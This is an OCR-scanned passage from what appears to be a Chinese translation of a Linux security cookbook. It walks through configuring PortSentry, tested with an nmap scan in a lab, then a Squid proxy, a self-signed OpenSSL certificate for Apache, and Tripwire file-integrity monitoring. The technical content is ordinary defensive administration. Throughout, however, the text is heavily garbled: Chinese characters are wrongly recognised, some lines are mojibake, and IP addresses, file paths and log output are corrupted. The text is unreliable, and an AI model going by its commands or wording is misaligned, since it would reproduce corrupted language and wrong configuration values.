2 11:20:01 tj-dev portsentry[10295]: adminalert: Going into listen mode on 
port: 32774 
2 11:20:01 tj-dev portsentry[10295]: adminalert: Going into listen mode on 
port: 40421 
2 11:20:01 tj-dev portsentry[10295]: adminalert: Going into listen mode on 
port: 49724 
2 11:20:01 tj-dev portsentry[10295]: adminalert: Going into listen mode on 
port: 54320 
2 11:20:01 tj-dev portsentry[10295]: adminalert: PortSentry is now active a 
nd listening. 
Feb 2 11:20:01 tj-dev portsentry[10298]: adminalert: PortSentry 1.2 is starting 


Feb 2 11:28:01 tj-dev portsentry[10299]: adminalert: Going into listen mode on 


:01 tj-dev portsentry[10299]: adminalert: Going into listen mode on 
UDP port: 7 


用 户 可 以 在 日 志 中 看 到 与 PortS9entry 相 天 的 消息 。 


4. 在 作为 客户 闯 的 第 二 个 系统 上 ， 运 行 下 述 Nmap 命 令 对 第 一 个 系统 进行 扫 朱 。 其 中 ，192.168.1.102 是 第 一 个 系统 的 |P 地 


址 : 


rootüclient:-£ nmap -sT -v 192.168.1.102 


Starting Nmap 5.21 ( http://nmap.org ) at 2016-02-03 07:34 IST 
Initiating ARP Ping Scan at 07:34 

Scanning 192.168.1.102 [1 port] 

Completed ARP Ping Scan at 07:34, 0.19s elapsed (1 total hosts) 
Initiating Parallel DNS resolution of 1 host. at 07:34 

Completed Parallel DNS resolution of 1 host. at 07:34, 13.00s elapsed 
Initiating Connect Scan at 07:34 


Scanning 192.168.1.102 [1000 ports] 

Discovered open port 80/tcp on 192.168.1.102 
Discovered open port 143/tcp on 192.168.1.102 
Discovered open port 111/tcp on 192.168.1.102 
Discovered open port 443/tcp on 192.168.1.102 
Discovered open port 31337/tcp on 192.168.1.102 
Discovered open port 32771/tcp on 192.168.1.102 


也 可 以 使 用 其 他 Nmap 命 令 对 运行 PortSentry 的 系统 执行 TCP 或 UDP 扫 朱 ，Namp 命 令 的 相 天 知识 参见 第 1 章 。 
在 上 图 所 示 的 扫 摘 结果 中 可 以 看 到 ， 即 使 第 一 个 系统 运行 着 Portsentry，Nmap 也 能 成 功 扫 摘 。 

可 以 从 客户 端 ping 服 务 器 ， 以 查看 在 服务 器 上 安 六 PortSentry 后 是 否 还 能 ping 通 。 

5. 在 服务 器 系统 上 通过 编辑 /etc/portsentry/portsentry.conf 文 件 来 配置 PortSentry。 

选择 一 种 编辑 器 打开 该 文件 ， 碍 找 下 述 文字 行 并 将 其 赋值 更 改 为 1: 


= Do not block UDP/TCP scans. 
Block UDP/TCP scans. 
- Run external command only (KILL RUN CMD) 


_UDP="1" 
BLOCK_TCP="1" 


往 下 滚动 文件 ， 找 到 并 取消 下 述 文字 行 前 面 的 注释 : 


# 
# iptables support for Linux 

KILL ROUTE-"/sbin/iptables -I INPUT -s STARGETS -j DROP" 
7 


取消 下 述 文 字 行 前 面 的 注释 : 


H 


KILL_HOSTS_DENY="ALL: STARGETS : DENY" 


完成 后 ， 保 存 并 关闭 文件 。 


6. 下 一 步 ， 编 辑 /etc/default/portsentry 文 件 : 


H 
TCP MODE-"atcp" 


UDP MODE-"audp" 


在 上 图 所 示 的 文字 行 中 ， 用 户 需 要 指定 PortSentry 的 端口 扫描 检测 模式 [1]。 


7. 编 辑 /etc/portsentryportsentry.ignore.static 文 件 ， 在 文件 最 底部 添加 一 行 ， 如 下 图 所 示 。 


127.9.0.1/32 
0.0.0.0 


192.168.1.104/255.255.255.0 


其 中 192.168.1.104 是 客户 机 的 IP 地 址 ，PortSentry 将 试图 阻止 它 。 
8. 运 行 下 述 命令 重启 PortSentry 服 务 : 


rootüserver:-4 /etc/init.d/portsentry restart 

Stopping anti portscan daemon: portsentry. 

Starting anti portscan daemon: portsentry in atcp & audp mode. 
root@server:~# 


9. 上 述 步骤 完成 后 ， 在 客户 机 上 再 次 运行 Nmap， 观 察 其 是 否 能 像 之 前 那样 正常 扫描 : 
rootüclient:-4 nmap -sT -v 192.168.1.102 


Starting Nmap 5.21 ( http://nmap.org ) at 2016-02-03 13:04 IST 
Initiating ARP Ping Scan at 13:04 

Scanning 192.168.1.102 [1 port] 

Completed ARP Ping Scan at 13:04, 0.27s elapsed (1 total hosts) 
Nmap scan report for 192.168.1.102 [host down] 


Read data files from: /usr/share/nmap 
Note: Host seems down. If it is really up, but blocking our ping probes, try -PN 
Nmap done: 1 IP address (8 hosts up) scanned in 0.39 seconds 
Raw packets sent: 2 (84B) | Rcvd: © (0B) 
root(client:-4 


由 上 图 可 见 ，Nmap 不 能 对 该 [P 地 址 进行 扫 摘 了 。 


10. 此 时 从 客户 机 无 法 ping 通 服务 器 : 


root@client:~# ping 192.168.1.102 
192.168.1.102 (192.168.1.102) 56(84) bytes of data. 
192.168.1.104 icmp seq-9 Destination Host Unreachable 
192.168.1.104 icmp seq-108 Destination Host Unreachable 
192.168.1.104 icmp seq-11 Destination Host Unreachable 


192.168.1.104 icmp seq-12 Destination Host Unreachable 
192.168.1.104 icmp seq-13 Destination Host Unreachable 
192.168.1.104 icmp seq-14 Destination Host Unreachable 


192.168.1.102 pi statistics --- 


11. 碍 看 /etc/hosts.deny 文 件 ， 会 上 友 现 已 目 动 添加 了 下 述 文字 行 : 


ALL: 192.168.1.104 : DENY 


12. 同 样 ， 查 看 /var/lib/portsentry/portsentry.history 文 件 ， 会 发 现 与 下 图 中 最 后 一 行 类 似 的 结果 。 


1454392513 - 02/02/2016 11:25:13 Host: 192.168.1.103/192.168.1.103 Port: 143 TCP Blocked 
1454395224 - 02/02/2016 12:10:24 Host: 192.168.1.183/192.168.1.103 Port: 554 TCP Blocked 


1454397794 - 02/02/2016 12:53:14 Host: 192.168.1.104/192.168.1.104 Por: 23 TCP Blocked 


原理 解析 


使 用 两 个 系统 : 一 个 系统 作为 PortSentry 服 务 器 ， 另 一 个 作为 客户 机 。 在 服务 器 系统 中 安 沪 PortSentry 软 件 包 ， 在 客户 机 上 
安装 Nmap 以 演示 PortSentry 的 效果 。 


在 客户 机 上 执行 Nmap 对 服务 器 进行 扫 摘 ， 结 果 显 示 可 以 正 弟 扫 摘 。 


然后 ， 根 据 需 求 通过 编辑 一 系列 文件 来 配置 PortSentry。 编 辑 完成 后 ， 重 局 PortSentry 服 务 ， 青 次 在 客 尸 机 上 执行 针对 服务 
器 的 Nmap 扫 描 ， 结 果 显 示 扫 摘 已 经 无 法 正 营 进行 。 


[1] 文件 /etc/default/pottsehtty 作 为 参数 传递 给 PortSentty 执 行程 序 ， 用 于 控制 PortSentry 的 端口 扫描 检测 模式 。 对 应 TCP 和 UDP 两 种 
协议 ，PortSenttry 分 别 有 三 种 端口 扫描 检测 模式 ， 即 基本 、 秘 客 和 高 级 秘 窗 扫 描 检 测 模式 ，TCP 的 三 个 模式 分 别 是 ttp、stcp 和 
译 者 注 


atcp，UDP 对 应 的 三 种 模式 分 别 是 udp、sudp 和 audp。 


7.3 ”使 用 Squid 代 理 服务 器 


9quid 是 一 款 有 多 种 配置 及 用 途 的 Web 代 理应 用 。 该 应 用 包含 大 量 的 访问 控制 方法 ， 并 文 持 不 同 的 协议 ， 如 HTTP、 
HTTPS、FTP、SSL 等 。 本 节 将 介绍 作为 HTTP 代 理 如何 使 用 Squid。 


准备 工作 


在 网 络 中 的 菜系 统 上 安 委 并 使 用 ?quid， 要 求 该 系统 物理 内 人 存 足 够 大 ， 因 为 quid 同 时 也 是 缓 仓 代 理 服务 器 ， 需 要 空间 来 维 
护 缓存 。 


本 节 将 以 Ubuntu 系统 作为 示例 。 在 Ubuntu 的 资源 库 中 提供 了 Squid 软 件 包 ， 需 要 确保 用 户 的 系统 是 最 新 的 。 可 以 通过 下 述 
命令 更 新 系统 : 


apt-get update 


更 新 完毕 后 ， 运 行 下 述 命令 升级 系统 上 


apt-get upgrade 


操作 指南 


采用 下 列 步骤 ， 人 在 系统 上 安 妆 及 配置 quid: 


rootüclient:-£ apt-get install squid 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 
squid-langpack squid3 squid3-common 
Suggested packages: 
squidclient squid-cgi 
The following NEW packages will be installed: 
squid squid-langpack squid3 squid3-common 
© upgraded, 4 newly installed, © to remove and 335 not upgraded. 
Need to get 1,954 kB of archives. 
After this operation, 6,610 kB of additional disk space will be used. 
Do you want to continue [Y/n]? 


2.Squid 安 六 完成 后 ， 开 始 以 默认 配置 运行 。 默 认 配 置 定义 为 阻塞 网 络 上 的 所 有 HTTP/HTTPs 流 量 。 


要 检验 阻 堵 效果 ， 需 要 在 网 络 上 的 任意 一 个 系统 中 配置 浏览 器 ， 指 定 其 代理 服务 器 为 上 面 安 装 了 Squid 的 主机 ， 如 下 图 所 
示 。 这 里 的 192.168.1.104 就 是 代理 服务 器 的 IP 地 址 。 


Configure Proxies to Access the Internet 
| No proxy 
| Auto-detect proxy settings for this network 
| Use system proxy settings 


& Manual proxy configuration: 


HTTP Proxy: 1921681104 ^ | Pert 3128 5 
| | Usethis proxy server for all protocols 

SSL Proxy: Port: 0 上 

FTP Proxy: Port: 0— 

SOCKS Host: Port: ilg 


© SOCKSv4 @ SOCKS 号 | | Remote DNS 
3 上 述 步骤 完成 后 ， 尝 试 访问 任意 网 站 ， 会 看 到 如 下 图 所 示 的 错误 ， 访 问 失败 : 


(€ | © | www.google.com 


ERROR 


The requested URL could not be retrieved 


The following error was encountered while trying to retrieve the URL: http://www.google.com/ 


Access Denied. 


Access control configuration prevents your request from being allowed at this time. Please contact your 
Your cache administrator is webmaster. 

4. 下 面 开 始 根据 需求 配置 代理 服务 器 。 需 要 在 任 一 编辑 器 中 编辑 /etc/squid3/sdquid.conf 文 件 。 

打开 该 文件 后 ， 坦 找 标记 TAG : visible hostname, 


在 这 个 标记 的 下 面 添加 文字 : visible hostname ourProxyServer, 


# TAG: visible hostname 

E If you want to present a special hostname in error messages, etc, 
i define this. Otherwise, the return value of gethostname() 
F 
= 


will be used. If you have multiple caches in a cluster and 
get errors about IP-forwarding you must set them to have individual 
# names with this setting. 
visible hostname ourProxyServer 
ttDefault: 
# visible hostname localhost 


其 中 ，ourProxyServer 是 给 代理 服务 器 取 的 名 字 ， 可 根据 用 户 喜 好 命 
5. 下 一 步 ， 查 找 标 记 TAG: cache mgr。 并 在 后 面 添加 文字 行 : cache mgr email(?yourdomainname, 


这 里 ， 可 以 用 管理 员 的 E-mail 1D 蔡 代 email@yourdomainname 作 为 联系 方式 。 


# ADMINISTRATIVE PARAMETERS 


# TAG: cache_mgr 

# Email-address of local cache manager who will receive 
n mail if the cache dies. The default is "webmaster." 
cache mgr emailgüyourdomainname 


6HE FERTRIET. http port3eszE X. f Squid RERA sais Dru L1. SAIANmIIzE3128, 8P ENIE — RRE 
用 的 端口 。 可 以 为 Squid 定 义 多 个 监听 端口 ， 如 下 图 所 示 : 


# Squid normally listens to port 3128 
http port 3128 8888 


7. 现 在 需要 根据 用 户 的 需求 添加 规则 ， 定 义 人 允许 的 网 络 流量 。 首 先 找 到 文字 行 acl localnet src 10.0.0.8， 在 这 里 添加 用 户 规 
则 acl localnetwork src 192.168.1.0/24， 如 下 图 所 示 : 


# Example rule allowing access from your local networks. 

# Adapt to list your (internal) IP networks from where browsing 

# should be allowed 

#acl localnet src 108.0.0.0/8 # RFC1918 possible internal network 

#acl localnet src 172.16.0.0/12 # RFC1918 possible internal network 

#acl localnet src 192.168.0.0/16 # RFC1918 possible internal network 

#acl localnet src fc00::/7 # RFC 4193 local private network range 

«acl localnet src fe80::/10 # RFC 4291 link-local (directly plugged) machiS 


acl localnetwork src 192.168.1.0/24 


在 上 面 添加 的 规则 中 ，acl 用 来 定义 新 规则 ，localnetwork 是 该 新 规则 的 名 字 ，src 表 示 到 达 代 理 服务 器 的 流量 的 源 地 址 ， 规 
则 中 以 包含 子 网 位 数 的 网 络 IP 地 址 作为 源 地 址 。 可 以 根据 用 户 需求 添加 更 多 规则 。 


8. 然 后 ， 碍 找 下 列 文 字 行 : http access allow localhost。 并 在 该 行 下 添加 下 述 内 容 : http access allow localnetwork, 


该 行文 字 用 于 局 用 前 面 添加 的 规则 ， 人 允许 符合 localnetwork 的 网 络 济 量 通过 。 


# Example rule allowing access from your local networks. 

# Adapt localnet in the ACL section to list your (internal) IP networks 
# from where browsing should be allowed 

ühttp access allow localnet 


http access allow localhost 


http access allow localnetwork 


9. 前 面 所 有 配置 步骤 完成 后 ， 使 用 下 述 命 令 重 启 Squid 服 务 : 


service squid3 restart 


10. 现 在 3quid 代 理 服务 器 已 运行 ， 为 了 验证 新 配置 的 效果 ， 在 网 络 上 任 一 系统 的 浏览 器 中 访问 代理 服务 器 的 |P 地 址 : 


(«€ 0 1921681104 


ERROR 


— The requested URL could not be retrieved 


The following error was encountered while trying to retrieve the URL: http://192.168.1.104/ 
Connection to 192.168.1.104 failed. 

The system returned: (111) Connection refused 

The remote host or network may be down. Please try the request again. 


Your cache administrator is emailiàyvourdomainname. 


Generated Thu, 11 Feb 2016 18:45:12 GMT by ourProxyServer [squid/3.1.19) 


上 图 所 示 的 报错 信息 表明 Squid 代 理 服务 器 工作 良好 。 现 在 尝试 访问 其 他 网 站 。 按 照 Squid 配 置 文 件 中 添加 的 规划， 这些 网 
站 应 该 能 够 打开 。 


原理 解析 


首先 安装 Squid 软 件 包 ， 安 装 完成 后 ， 编 辑 配 置 文件 /etc/squid3/squid.conf， 添 加 主机 名 、 管 理 员 E-mail ID、 监 听 的 端 


然后 创建 规则 允许 来 自 同一 网 络 上 所 有 系统 的 网 络 流量 通过 。 所 有 配置 保存 后 ， 重 新 局 动 Squid 服 务 ， 代 理 服务 器 开始 正常 
工作 。 


[1] update 用 于 从 设置 的 软件 资源 库 中 下 载 最 新 的 软件 包 列 表 文 件 ， 更 新 本 地 软件 包 信息 ， 包 括 软 件 名 、 版 本 、 校 验 值 、 依 赖 关 系 


等 。 而 upgrade 是 根据 列表 文件 对 系统 中 已 经 安装 的 所 有 软件 包 进行 可 能 的 升级 。 一 一 译 者 注 


SSL (安全 套 接 层 ) 是 用 于 在 互联 网 上 传输 敏感 信息 的 协议 。 这 些 信息 包括 账号 密码 、 信 用 卡 详细 信息 等 。SSL 常 用 于 基于 
HTTP 协 议 的 Web 浏 览 器 中 。 


OpenSSL 库 提供 了 一 个 安全 套 接 层 (Secure Sockets Layer, SSL) 和 传输 层 安 全 (Transport Layer Security, TLS) 协议 
的 实现 。 


下 面 介绍 如 何 使 用 OpenSSL 为 Apache 创 建 自 签 名 证 书 ， 访 证书 用 于 加 密 发 送 到 服务 器 的 网 络 流量 。 


1. 使 用 下 述 命 令 在 第 一 个 系统 上 安装 OpenSSL 包 : 


rootütj-dev:-£ apt-get install openssl 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following packages will be upgraded: 
openssl 
1 upgraded, © newly installed, © to remove and 334 not upgraded. 
Need to get 519 kB of archives. 
After this operation, 1,0824 B of additional disk space will be used. 
Get:1 http://in.archive.ubuntu.com/ubuntu/ precise-updates/main openssl i386 1.0 
.1-4ubuntu5.33 [519 kB] 
Fetched 519 kB in 2s (188 kB/s) 
(Reading database ... 147193 files and directories currently installed.) 
Preparing to replace openssl 1.0.1-4ubuntu5.11 (using .../openssl 1.0.1-4ubuntu5 
.33 1386.deb) 
unpacking replacement openssl . 
Processing triggers for man-db ... 
Setting up openssl (1.98.1-4ubuntu5.33) ... 


2. 然 后 ， 如 下 图 所 示 在 系统 上 安装 Apache: 


rootütj-dev:-4 apt-get install apache2 


Reading package lists... Done 


Building dependency tree 

Reading state information... Done 

The following extra packages will be installed: 
apache2-mpm-worker apache2-utils apache2.2-bin apache2.2-common libapri 
libaprutili1 libaprutili-dbd-sqlite3 libaprutili-ldap 

Suggested packages: 
apache2-doc apache2-suexec apache2-suexec-custom 

The following NEW packages will be installed: 
apache2 apache2-mpm-worker apache2-utils apache2.2-bin apache2.2-common 
libapri libaprutili libaprutili-dbd-sqlite3 libaprutili-ldap 

© upgraded, 9 newly installed, © to remove and 335 not upgraded. 

Need to get 1,836 kB of archives. 

After this operation, 5,2308 kB of additional disk space will be used. 

Do you want to continue [Y/n]? y 


root@tj-dev:~# a2enmod ssl 

Enabling module ssl. 

See /usr/share/doc/apache2.2-common/README.Debian.gz on how to configure SSL and 
create self-signed certificates. 
To activate the new configuration, you need to run: 

service apache2 restart 

root@tj-dev:~# service apache2 restart 

* Restarting web server apache2 

apache2: Could not reliably determine the server's fully qualified domain name, 
using 127.0.1.1 for ServerName 

. waiting apache2: Could not reliably determine the server's fully qualified 

domain name, using 127.0.1.1 for ServerName 


[ OK ] 
局 用 SSL 支 持 后 ， 使 用 下 述 命令 重启 Apache: 
service apache2 restart 


4. 使 用 下 述 命令 在 Apache 的 配置 目录 下 创建 一 个 新 目录 用 于 存放 证 书 文件 。 在 后 续 步骤 中 将 生成 这 些 证 书 文件 。 
mkdir /etc/apache2/ssl 


5. 使 用 下 图 所 示 的 命令 创建 密 钥 及 证 书 : 


root@tj-dev:~# openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ 
apache2/ssl/server.key -out /etc/apache2/ssl/server.crt 
Generating a 2048 bit RSA private key 


在 上 图 所 示 的 命令 中 : 


- req-x509 表 示 将 遵循 X.509 证 书签 名 请 求 (CSR) 管理 规范 创建 自 签名 证 书 。 


` -nodes 表 示 创 建 的 冤 钥 文件 不 需要 禾 码 保护 。 


: -days 365 表 示 创 建 的 证 书 有 效 期 为 1 年 。 


: -newkey rsa: 2048 表 示 将 同时 创建 私 钥 文 件 和 证 书 文 件 ， 并 且 密 钥 长 度 为 2048 比 特 。 


-keyout 为 创建 的 私 钥 文 件 名 。 


. -out 为 创建 的 证 书 文 件 名 。 


6. 在 创建 密 铀 和 证 书 文 件 的 过 程 中 ， 会 询问 几 个 问题 。 需 要 用 户 根据 配置 情况 提供 详情 。 其 中 common Name (如 服务 器 
FQDN 或 者 用 户 名 ) 选项 很 重要 ， 需 要 提供 域名 或 者 服务 器 的 公开 IP 地 址 : 


You are about to be asked to enter information that will be incorporated 
into your certificate 
What you are about to 
There are quite a few 
For some fields there 
If you enter '.', the 


request. 

enter is what is called a Distinguished Name or a DN. 
fields but you can leave some blank 

will be a default value, 

field will be left blank. 


Country Name (2 letter code) [AU]:IN 

State or Province Name (full name) [Some-State]:DEL 

Locality Name (eg, city) []:DEL 

Organization Name (eg, company) [Internet Widgits Pty Ltd]:Tajinder Kalsi 
Organizational Unit Name (eg, section) []:Tajinder Kalsi 

Common Name (e.g. server FQDN or YOUR name) []:192.168.1.103 

Enail Address []:infogtajinderkalsi.com 


7. 下 一 步 需要 编辑 /etc/apache2/sites-available/default 文 件 ， 配 置 Apache 使 用 前 面 创建 的 密 钥 文 件 和 证 书 文件 。 


找到 并 编辑 如 下 图 所 示 的 文字 行 。 


«VirtualHost *:443» 


对 serverName 项 ， 我 们 提供 了 Apache 服 务 系统 的 I|P 地 址 及 端口 号 。 


ServerAdmin webmaster(llocalhost 
ServerName 192.168.1.103:443 


滩 动 到 该 文件 的 末尾 ， 在 </VirtualHost> 之 前 ， 添 加 如 下 图 所 示 的 文字 行 ， 指 定 创建 的 密 钥 文件 及 证 书 文 件 名 称 。 


SSLEngine on 


SSLCertificateFile /etc/apache2/ssl/server.crt 
SSLCertificateKeyFile /etc/apache2/ssl/server.key 


«/VirtualHost» 


8. 在 客户 机 系统 上 ， 打 开 浏览 器 并 以 https:// 协 议 形 式 访问 Apache 服 务 器 的 I|P 地 址 ， 如 下 图 所 示 : 


€ | 图 https://192.168.1.103 - Œ| | 图 Google Q 1: 


一 This Connection is Untrusted 


You have asked Firefox to connect securely to 192.168.1.103, but we can't 
confirm that your connection is secure. 


Normally, when you try to connect securely, sites will present trusted 
identification to prove that you are going to the right place. However, this site's 
identity can't be verified. 


What Should I Do? 


IF you usually connect to this site without problems, this error could mean that 
someone is trying to impersonate the site, and you shouldn't continue. 


| Get me out of here! | 
> Technical Details 


» I Understand the Risks 


浏 昂 器 显示 不 安全 连接 警告 信息 ， 这 是 因为 证 书 不 是 由 可 信任 机 攀 签 友 的 。 


9. 单 击 “| Understand the Risks”， 表 示 用 户 已 了 解 当前 存在 的 风险 ， 然 后 单 击 “Add Exception” 按 钮 为 浏览 器 添加 证 
书 : 


IF you understand what's going on, you can tell Firefox to start trusting this site's 
identification. Even if you trust the site, this error could mean that 
someone is tampering with your connection. 


Don't add an exception unless you know there's a good reason why this site 
doesn't use trusted identification. 


| Add Exception... | 


10. 下 一 窗口 将 显示 服务 器 的 一 些 信息 ， 单 击 “Confirm Security Exception” 添 加 证 书 并 进行 下 一 步 : 


Add Security Exception 


You are about to override how Firefox identifies this site. 


Legitimate banks, stores, and other public sites will not 
ask you Eo do Ehis. 


Server 


Location: 


Certificate Status 
This site attempts to identify itself with invalid 


inFormation. | 
Unknown Identity 

Certificate is not trusted, because it hasn't been verified by a 
recognized authority using a secure signature. 


图 Permanently store this exception 


| Confirm Security Exception. | Camel | 


11. 欲 查看 证 书 的 更 多 详情 ， 在 前 面 界 面 中 单 击 “View” 按 钮 ， 将 弹出 新 的 窗口 显示 证 书 的 完整 详情 ， 如 下 图 所 示 : 


Certificate Viewer:"192.168.1.103" 


|General Details 


Could not verify this certificate because the issuer is not trusted. 


Issued To 

Common Name (CN) 192.168.1.103 

Organization (0O) Tajinder Kalsi 

Organizational Unit (OU) Tajinder Kalsi 

Serial Number 00:E6:41:95:BA:4A:3D:75:86 

Issued By 

Common Name (CN) 192.168.1.103 

Organization (0O) Tajinder Kalsi 

Organizational Unit (OU) Tajinder Kalsi 

Validity 

Issued On Monday 01 February 2016 

Expires On Tuesday 31 January 2017 

Fingerprints 

SHA1 Fingerprint 5B:17:7A:61:2C: 7E:19:AA:FB: 72:90:D 7:18: 7 1:D5: 4B: CS: C7:8E:9C 
MD5 Fingerprint 3A:54:DB:88:45:58: A0: 8F:A 1T:EA:DE:OD:C 1:0D:A 7:02 


12. 成 功 添 加 证 书后 ， 如 下 图 所 示 ， 将 完成 网 页 的 载 入 : 


= i https://192.168.1.103 "© E> Google q 


It works! 


This is the default web page for this server. 


The web server software is running but no content has been added, yet. 


原理 解析 


该 实验 中 使 用 了 两 个 系统 : 一 个 是 装 有 OpenSSL 软 件 包 和 Apache 的 服务 器 ， 另 一 个 系统 作为 客户 机 ， 从 该 系统 上 连接 
Apache Web 服 务 器 。 


在 第 一 个 系统 上 安装 完 Apache 及 OpenSSL 软 件 包 后 ， 为 Apache 启 用 SSL 支 持 ， 并 使 用 OpenSSL 工 具 及 参数 创建 服务 器 的 
密 钥 文件 及 证 书 文件 。 


然后 编辑 /etc/apache2/sites-available/default 文 件 ， 使 得 Apache 可 使 用 前 面 创建 的 密 钥 文件 及 证 书 文件 。 


完成 这 些 步骤 后 ， 通 过 客户 机 上 的 浏览 器 访问 Apache Web 服 务 器 ， 会 友 现 需要 将 新 的 证 书 添加 到 浏览 器 。 添 加 之 后 ， 束 
可 以 使 用 HTTPS 协 议 访问 Web 服 务 器 了 。 


7.5 Tripwire 


BSESDXJBR2SSSHJIIRE Pme, MEETER S AER, (RXEDRUEREAON REDUCE AU — E. 


Tripwire 是 一 款 基 于 主机 的 入 侵 检 测 系 统 (DS) ， 访 系统 用 于 监控 不 同文 件 系统 的 数据 点 ， 当 文件 被 修改 或 变更 时 会 友 出 


准备 工作 


我 们 只 需 在 自己 的 Linux 系 统 上 安装 Tripwire， 并 配置 IDS 即 可。 下 面 将 演示 如 何 安 装 并 配置 该 工具 。 


操作 指南 
下 面 将 分 步 讨论 如 何在 Ubuntu 系 统 上 安 濠 并 配置 Tripwire: 
1. 首 先 使 用 apt-get 命 令 安装 Tripwire， 如 下 图 所 示 : 


root@sshclient:~# apt-get install tripwire 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 
postfix 
Suggested packages: 
procmail postfix-mysql postfix-pgsql postfix-ldap postfix-pcre sasl2-bin 
dovecot-common postfix-cdb postfix-doc 
The following NEW packages will be installed: 
postfix tripwire 
0 upgraded, 2 newly installed, © to remove and 323 not upgraded. 
Need to get 4,827 kB of archives. 
After this operation, 11.8 MB of additional disk space will be used. 
Do you want to continue [Y/n]? y 
Get:1 http://in.archive.ubuntu.com/ubuntu/ precise-updates/main postfix i386 2.9 
.6-1-12.04.3 [1,273 kB] 
Get:2 http://in.archive.ubuntu.com/ubuntu/ precise/universe tripwire i386 2.4.2. 
2-1 [3,554 kB] 


2. ERRERA RERBA, RR «Ok TRTIBHEGE SEE. 


3. 在 下 一 个 “General type of mail configuration" (通用 类 型 邮件 配置 ) 窗口 中 选择 "Internet Site" (因特网 网 站 ) 
并 按 下 <Ok>: 


Postfix Configuration 
General type of mail configuration: 


No configuration 
Internet Site 

Internet with smarthost 
Satellite system 

Local only 


«Ok» «Cancel» 


4. 下 一 个 窗口 将 询问 “System mail name" (系统 邮件 名 称 ) ， 输 入 当前 正在 配置 的 Tripwire 的 系统 域名 : 


Postfix Configuration 
The "mail name" is the domain name used to "qualify" ALL mail 
addresses without a domain name. This includes mail to and from «root»: 
please do not make your machine send out mail from root(lexample.org 
unless root(iexample.org has told you to. 


| This name will also be used by other programs. It should be the single, 
fully qualified domain name (FQDN). 


| Thus, if a mail address on the local host is foo(jexample.org, the 
| correct value for this option would be example.org. 


| System mail name: 
| 


«Cancel» 


5. 输 入 完毕 后 ， 按 下 <Ok> 继 续 安装 。 


6. 下 图 所 示 窗 口 将 询问 用 户 是 否 愿意 为 Tripwire 创 建 密码 ， 选 择 <Yes> 继 续 后 续 步 骤 : 


Tripwire Configuration 


Do you wish to create/use your site key passphrase during installation? 


7. 下 图 所 示 窗 口 将 询问 用 户 是 否 愿意 重新 编译 配置 文件 ， 选 择 <Yes> 继 续 后 续 步 又 : 


1 Tripwire Configuration 


| Tripwire keeps its configuration in a encrypted database that is 
| generated, by default, from /etc/tripwire/twcfg.txt 


| Any changes to /etc/tripwire/twcfg.txt, either as a result of a change 
in this package or due to administrator activity, require the 
regeneration of the encrypted database before they will take effect. 


Selecting this action will result in your being prompted for the site 
key passphrase during the post-installation process of this package. 


Rebuild Tripwire configuration file? 


8. 下 一 步 ， 选 择 <Yes> 重 新 编译 Tripwire 的 策略 文件 : 


Tripwire Configuration 


| Tripwire keeps its policies on what attributes of which files should be 
| monitored in a encrypted database that is generated, by default, from 
[etc/tripwire/twpol.txt 


| Any changes to /etc/tripwire/twpol.txt, either as a result of a change 
in this package or due to administrator activity, require the 
regeneration of the encrypted database before they will take effect. 


Selecting this action will result in your being prompted for the site 
key passphrase during the post-installation process of this package. 


Rebuild Tripwire policy file? 


9. 下 一 步 ， 用 户 输入 Tripwire 的 网 络 密 钥 密码 : 


| | Get site passphrase 

| Tripwire uses two different keys for authentication and encryption of 

| files. The site key is used to protect files that could be used across 
several systems. This includes the policy and configuration files. 


| You are being prompted for this passphrase either because no site key 

| exists at this time or because you have requested the rebuilding of the 
policy or configuration files. 

| Remember this passphrase; it is not stored anywhere! 

Enter site-key passphrase: 


Leod odd od 


«Ok» 


下 一 个 窗口 将 要 求 用 户 再 次 确认 输入 密码 。 


10. 下 一 步 ， 为 本 地 密 钥 输入 密码 并 在 下 一 窗口 中 确认 : 


| | Get local passphrase 

| Tripwire uses two different keys for authentication and encryption of 

| files. The local key is used to protect files specific to the local 

| machine, such as the Tripwire database. The local key may also be used 
for signing integrity check reports. 


You are being prompted for this passphrase because no local key file 
| currently exists. 


| Remember this passphrase; it is not stored anywhere! 


Enter local key passphrase: 


11. FAATAA FANEAR, TR R«Ok»ToBESCR. 


Get local passphrase 


| Tripwire has been installed 


The Tripwire binaries are located in /usr/sbin and the database is 
located in /var/lib/tripwire. It is strongly advised that these 
locations be stored on write-protected media (e.g. mounted RO floppy). 
See /usr/share/doc/tripwire/README.Debian for details. 


12. 安 装 完 成 后 ， 下 一 步 是 初始 化 Tripwire 数 据 库 。 运 行 下 图 中 所 示 的 命令 : 


rootüsshclient:-£ tripwire --init 


Please enter your local passphrase: 
Parsing policy file: /etc/tripwire/tw.pol 
Generating the database... 

*** Processing Unix File System *** 

### Warning: File system error. 


Filename: /var/lib/tripwire/sshclient.com.twd 
No such file or directory 

Continuing... 

Warning: File system error. 

Filename: /etc/rc.boot 

No such file or directory 

Continuing... 


在 上 图 的 输出 中 ， 在 很 多 文件 名 后 显示 “No such file or directory" 错误， 这 是 因为 Tripwire 扫 描 了 配置 文件 中 设置 的 所 
有 文件 ， 不 论 系统 中 是 否 仔 在 这 些 文 件 。 


13. 如 果 希 望 清除 这 些 错误 ,需要 编辑 /etc/tripwire/tw.pol 文 件 ， 该 文件 中 有 些 文字 行 指向 的 文件 /目录 在 当前 系统 中 不 存 
在 ,注释 挥 这 些 文字 行 即 可 。 也 可 以 对 这 些 错误 置之不理 ， 因 为 其 并 不 影响 Tripwire 功 能 。 


14. 下 一 步 测试 Tripwire 如 何 工作 。 通 过 运行 下 述 命令 创建 新 文件 : 
touch tripwire testing 


用 户 可 以 根据 目 己 的 喜好 为 新 创建 的 文件 合 


15. 运 行 Tripwire 的 交互 命令 ,测试 Tripwire 是 否 正在 工作 ， 命 令 如 下 所 示 : 


tripwire --check --interactive 


Open Source Tripwire(R) 2.4.2.2 Integrity Check Report 


Report generated by: root 
Report created on: Thu Jan 28 08:40:49 2016 
Database last updated on: 


Host name: sshclient.com 

Host IP address: 69.172.201.208 

Host ID: None 

Policy file used: /etc/tripwire/tw.pol 

Configuration file used: /etc/tripwire/tw.cfg 

Database file used: /var/lib/tripwire/sshclient.com.twd 
Command line used: tripwire --check --interactive 


上 图 显示 了 检测 结果 ，Tripwire 检 测 所 有 文件 /目录 ， 如 果 有 任何 修改 ， 将 作为 输出 结果 显示 : 


Added: 


[x] "/root/tripwire testing" 


